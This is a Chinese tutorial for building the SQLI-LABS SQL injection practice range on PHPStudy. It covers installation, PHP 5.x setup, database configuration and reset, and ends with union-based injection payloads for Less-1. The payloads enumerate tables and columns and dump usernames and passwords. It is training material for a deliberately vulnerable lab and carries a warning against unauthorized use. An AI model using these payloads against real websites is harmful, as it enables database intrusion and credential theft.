SQL注入练习场:PHPStudy+SQLI-LABS靶场搭建教程(零基础友好版)

注意:文中涉及演示均为模拟测试,切勿用于真实环境,任何未授权测试都是违法行为!

一、环境准备

  1. 下载PHPStudy
    官网下载地址:https://www.xp.cn/php-study(选择Windows版)

安装时建议选择自定义路径 (如 D:\phpstudy_pro),避免系统盘权限问题

  1. 下载SQLI-LABS源码
    从GitHub获取源码包:https://github.com/Audi-1/sqli-labs

    下载完成后解压,将文件夹重命名为sqli-labs(避免中文路径)。

二、PHPStudy配置

  1. 启动基础服务
    打开PHPStudy,启动ApacheMySQL 服务(图2:服务启动界面)。

若MySQL启动失败,检查端口是否被占用(默认3306)。

  1. 切换PHP版本
    点击左侧菜单【网站】→ 选择【管理】→【PHP版本】→更多→ 安装PHP5.5.9 (SQLI-LABS不支持PHP7+)。
    切换后需重启Apache服务(图3:PHP版本切换界面)。

三、部署SQLI-LABS靶场

  1. 放置源码文件

    sqlilabs文件夹复制到PHPStudy的网站根目录(默认路径:D:\phpstudy_pro\WWW)。

  2. 配置数据库连接

    打开文件sqlilabs/sql-connections/db-creds.inc,修改以下参数:

    php 复制代码
    $dbuser = 'root';    // 数据库用户名(默认)
    $dbpass = 'root';    // 数据库密码(若未修改则为空)

四、初始化靶场数据库

  1. 访问靶场页面
    浏览器输入http://localhost/sqli-labs/,进入SQLI-LABS首页。

点击页面中的Setup/reset Database for labs 链接

  1. 验证初始化结果
    若显示Congratulations! Database is connected...,表示数据库创建成功。
    若报错mysql_connect() undefined,需检查PHP版本是否为5.x 。

五、开始注入练习

  1. 选择关卡
    返回首页点击Less-1 (基础注入关卡),通过URL参数?id=1测试注入点。
    示例Payload:?id=1' and 1=2 union select 1,2,3 --+查看显示位

    ?id=1' and 1=2 union select 1,2,database()--+显示出数据库名

    ?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
    查看数据库的所有表

    ?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+查看users表中的字段

    ?id=1' and 1=2 union select 1,2,group_concat(username,0x7e,password) from security.users --+查看全部用户名和密码

还可以下载phpmyadmin管理数据库

  1. 常见问题排查
    数据库连接失败 :检查db-creds.inc密码是否与PHPStudy的MySQL一致。
    页面无法访问 :确认sqlilabs文件夹是否位于WWW目录,且Apache端口未被占用。
相关推荐
Hello.Reader3 小时前
Redis 延迟监控深度指南
数据库·redis·缓存
ybq195133454313 小时前
Redis-主从复制-分布式系统
java·数据库·redis
码农12138号3 小时前
BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析
web安全·网络安全·文件上传漏洞·buuctf·解析漏洞
好奇的菜鸟6 小时前
如何在IntelliJ IDEA中设置数据库连接全局共享
java·数据库·intellij-idea
tan180°6 小时前
MySQL表的操作(3)
linux·数据库·c++·vscode·后端·mysql
满昕欢喜6 小时前
SQL Server从入门到项目实践(超值版)读书笔记 20
数据库·sql·sqlserver
Hello.Reader8 小时前
Redis 延迟排查与优化全攻略
数据库·redis·缓存
简佐义的博客8 小时前
破解非模式物种GO/KEGG注释难题
开发语言·数据库·后端·oracle·golang
爬山算法8 小时前
MySQL(116)如何监控负载均衡状态?
数据库·mysql·负载均衡
JAVA学习通10 小时前
Mybatis--动态SQL
sql·tomcat·mybatis